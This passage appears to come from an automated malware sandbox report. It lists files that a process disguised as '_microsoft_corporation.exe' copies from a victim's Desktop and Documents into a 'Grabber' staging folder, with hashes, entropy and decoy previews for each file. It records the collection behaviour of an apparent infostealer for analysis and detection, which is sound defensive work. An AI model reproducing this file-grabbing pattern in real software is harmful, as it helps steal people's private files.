Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ZBEDCJPBEY.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6994061563025005
Encrypted:	false
SSDEEP:	24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5:	A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:	6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:	A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:	0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:	false
Preview:	ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.514693737970008
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
MD5:	9E36CC3537EE9EE1E3B10FA4E761045B
SHA1:	7726F55012E1E26CC762C9982E7C6C54CA7BB303
SHA-256:	4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
SHA-512:	5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.3.....

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Documents\BPMLNOBVSB.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702896917219035
Encrypted:	false
SSDEEP:	24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
MD5:	C68274AA8B7F713157BEBE2FCC2EA5D3
SHA1:	52A5A2D615A813B518DDAAC2A02095F1059DAAD5
SHA-256:	362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
SHA-512:	BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
Malicious:	false
Preview:	BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Documents\DVWHKMNFNN.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Documents\DVWHKMNFNN\DVWHKMNFNN.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Documents\DVWHKMNFNN\LTKMYBSEYZ.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Documents\DVWHKMNFNN\NWTVCDUMOB.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Documents\DVWHKMNFNN\WUTJSCBCFX.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Documents\DVWHKMNFNN\YPSIACHYXW.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Grabber\DRIVE-C\Users\user\Documents\KZWFNRXYKI.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

